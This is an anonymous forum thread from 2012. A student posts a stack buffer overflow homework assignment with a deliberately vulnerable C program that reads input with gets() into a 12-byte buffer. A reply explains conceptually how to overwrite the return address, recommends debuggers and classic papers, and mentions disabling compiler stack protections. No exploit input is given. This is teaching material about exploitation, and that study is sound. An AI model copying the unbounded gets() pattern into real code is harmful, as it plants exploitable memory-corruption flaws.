Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

stack buffer overflow

Name: Anonymous 2012-07-26 13:33

I come to you for help with this assignment I have; smashing the stack. Implement a buffer overflow attack on the program, isThisGood.c, by exploiting the input, see gets(). If exploit successful, it should invoke the function oopsIGotToTheBadFunction!

a. What is the address of the function oopsIGotToTheBadFunction()?
How did you determine this?

b. What is the address on the stack that your input must overwrite
(address and content please)? How did you locate this address?

c. What is the address of buf?

d. What is the minimum length your input, the length you need to alter
the return address stored on the stack.

e. what is your input - show it in hexa characters since some of the
input is not likely to be printable.

#include <stdio.h>
#include <stdlib.h>

int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}

int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}

int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}

Name: Anonymous 2012-07-26 23:30

>>1,8,9

You have to load the buf buffer with the address of the oopsIGotToTheBadFunction function.

buf is a local variable inside the good function (I'm tired of writing those stupid names). Therefore, it exists inside a stack frame. Somewhere after the local variables on the stack frame, there is a return address for that function. Memory is laid out sequentially.

Now, if only you could find a way to scribble over the return address of the good function and replace it with a call to the bad function, instead of a having it jump back in place inside main()...

Since you probably don't understand what those terms mean intuitively, you need to go do some learning on your own. I'm not going to write code for you, nor am I going to answer your questions for you.

Your first step begins with learning to use a debugger. Ollydbg on Windows is fine. I've only used gdb on Linux, but it'll work for small things (I wouldn't want to try reversing with gdb), including this assignment. For example, trying to view the stack pointer when there's no program running or paused at a breakpoint will cause it to show up as empty.

Your next step is to learn about the stack. Try Wikipedia (http://en.wikipedia.org/wiki/Call_stack#Structure).

Finally, gcc (and presumably other compilers, though I don't have anything else to verify this with) has some nice things built in to make stack smashing more difficult for you. You'll need to disable those when they become a problem. A quick Google search will suffice.

The classic paper on this topic is http://insecure.org/stf/smashstack.html

This has nice pictures: http://en.wikipedia.org/wiki/Stack_buffer_overflow

Deep understanding of this stuff requires knowledge of x86 ASM (assuming you're on that platform) and how it interacts with high(er)-level languages, namely, C. Any class that attempts to make you an expert in that in a semester with some shitty assignments like this one is stupid. Focus on getting the exploit to work (and yes, I was able to get it to work).

Merry Christmas
Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -